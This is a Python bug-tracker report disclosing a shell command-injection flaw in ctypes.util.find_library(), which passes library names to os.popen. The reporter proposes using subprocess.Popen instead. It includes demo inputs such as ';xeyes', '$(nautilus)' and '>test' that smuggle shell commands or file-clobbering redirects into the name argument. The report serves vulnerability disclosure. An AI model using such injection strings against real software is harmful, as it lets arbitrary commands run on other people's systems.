Message255482
The find_library() function can execute code when special chars like ;|`<>$ are in the name.
The "os.popen()" calls in the util.py script should be replaced with "subprocess.Popen()".
Demo Exploits for Linux :
====================
>>> from ctypes.util import find_library
>>> find_library(";xeyes") # runs xeyes
>>> find_library("|xterm") # runs terminal
>>> find_library("&gimp") # runs gimp
>>> find_library("$(nautilus)") # runs filemanager
>>> find_library(">test") # creates, and if exists, erases a file "test"
==== Traceback ====
>>> find_library("`xmessage hello`") # shows a message, press ctrl+c for Traceback
^CTraceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
trace = f.read()
KeyboardInterrupt
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068 |
|
Date |
User |
Action |
Args |
2015-11-27 20:19:20 | TheRegRunner | set | recipients:
+ TheRegRunner |
2015-11-27 20:19:20 | TheRegRunner | set | messageid: <1448655560.8.0.523539379986.issue25751@psf.upfronthosting.co.za> |
2015-11-27 20:19:20 | TheRegRunner | link | issue25751 messages |
2015-11-27 20:19:20 | TheRegRunner | create | |
|